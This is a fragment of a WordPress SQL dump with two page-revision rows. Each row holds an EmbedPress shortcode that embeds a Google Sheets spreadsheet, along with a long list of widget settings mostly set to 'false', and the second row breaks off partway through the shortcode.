(1591,1,'2025-07-01 14:54:25','2025-07-01 07:54:25','[embedpress embedpress_embeded_link=\'https://docs.google.com/spreadsheets/d/18Al9i8m54QFeeHUxK9Yr6AVWTM3sifGz/edit?usp=sharing&amp;ouid=116408890257525538205&amp;rtpof=true&amp;sd=true\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' height=\'800\' align=\'center\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://docs.google.com/spreadsheets/d/18Al9i8m54QFeeHUxK9Yr6AVWTM3sifGz/edit?usp=sharing&#038;ouid=116408890257525538205&#038;rtpof=true&#038;sd=true[/embedpress]','Elementor #1571','','inherit','closed','closed','','1571-revision-v1','','','2025-07-01 14:54:25','2025-07-01 07:54:25','',1571,'http://pakhaeng.ssk.in.th/?p=1591',0,'revision','',0),
(1592,1,'2025-07-01 14:55:27','2025-07-01 07:55:27','[embedpress embedpress_embeded_link=\'https://docs.google.com/spreadsheets/d/18Al9i8m54QFeeHUxK9Yr6AVWTM3sifGz/edit?usp=sharing&amp;ouid=116408890257525538205&amp;rtpof=true&amp;sd=true\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' height=\'800\' align=\'center\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' 